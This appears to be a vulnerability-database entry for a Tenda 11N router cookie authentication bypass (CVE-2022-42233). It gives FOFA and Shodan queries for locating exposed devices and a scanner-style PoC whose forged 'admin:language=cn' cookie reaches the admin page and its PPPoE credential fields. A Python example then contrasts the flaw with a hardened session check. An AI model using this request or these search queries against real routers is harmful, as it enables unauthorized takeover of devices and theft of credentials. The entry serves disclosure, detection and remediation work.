tenda-11n-cookie-unauth-access: Tenda 11N Wireless Router Cookie Unauthorized Access Vulnerability

Date: 2025-09-01 | Affected software: Tenda 11N | PoC: public

Vulnerability description

The Tenda 11N wireless router validates only the Cookie, so any user who forges the Cookie can enter the admin backend.

FOFA: app="TENDA-11N无线路由器"
FOFA: product=="Tenda-11N-Wireless-AP"
SHODAN: http.title:"Tenda 11N"

PoC code [public]

id: tenda-11n-cookie-unauth-access

info:
  name: Tenda 11N无线路由器 Cookie 越权访问漏洞
  author: zan8in
  severity: high
  description: |
    Tenda 11N无线路由器由于只验证Cookie,导致任意用户伪造Cookie即可进入后台
    FOFA: app="TENDA-11N无线路由器"
    FOFA: product=="Tenda-11N-Wireless-AP"
    SHODAN: http.title:"Tenda 11N"
  reference:
    - https://github.com/D0ngsec/vulns/blob/main/Tenda/Tenda_11N_Authentication_Bypass.md
    - https://nvd.nist.gov/vuln/detail/CVE-2022-42233
  tags: cve,cve2022,tenda,auth-bypass,router,iot
  created: 2023/06/16

rules:
  r0:
    request:
      method: GET
      path: /index.asp
      headers:
        Cookie: admin:language=cn
    expression: response.status == 200 && response.body.bcontains(b'<title>TENDA') && response.body.bcontains(b'def_PUN') && response.body.bcontains(b'def_PPW') && response.body.bcontains(b'def_WANT')
expression: r0()
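
The flaw described above, next to a corrected session check, as an added example that is not the router's firmware nor part of the original PoC. `weak_is_authenticated` is an assumed model of "only the Cookie is validated"; `SessionStore`, the `session` cookie name, the password and the timeout are hypothetical.

```python
import hmac
import secrets
import time

ADMIN_PASSWORD = "constructed-sample-password"  # constructed sample, not a real default
SESSION_TTL = 600  # seconds; assumed session lifetime for this example


def parse_cookie(header):
    """Split a Cookie header into a name -> value dict."""
    pairs = (part.strip().partition("=") for part in header.split(";"))
    return {name: value for name, _, value in pairs if name}


def weak_is_authenticated(cookie_header):
    """Assumed model of the flaw: the decision rests on a client-chosen cookie name."""
    return any(name.startswith("admin") for name in parse_cookie(cookie_header))


class SessionStore:
    """Hardened form: the cookie only carries a random token the server issued."""

    def __init__(self):
        self._sessions = {}  # token -> expiry (epoch seconds)

    def login(self, password, now=None):
        now = time.time() if now is None else now
        # Constant-time comparison of the submitted password.
        if not hmac.compare_digest(password.encode(), ADMIN_PASSWORD.encode()):
            return None
        token = secrets.token_urlsafe(32)  # unguessable, created server-side
        self._sessions[token] = now + SESSION_TTL
        return token

    def is_authenticated(self, cookie_header, now=None):
        now = time.time() if now is None else now
        token = parse_cookie(cookie_header).get("session", "")
        expiry = self._sessions.get(token)
        if expiry is None:
            return False  # token was never issued by this server
        if now >= expiry:
            del self._sessions[token]  # drop expired sessions
            return False
        return True
```

The cookie from the PoC request passes the weak check but is rejected by the store, because no server-issued token backs it.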
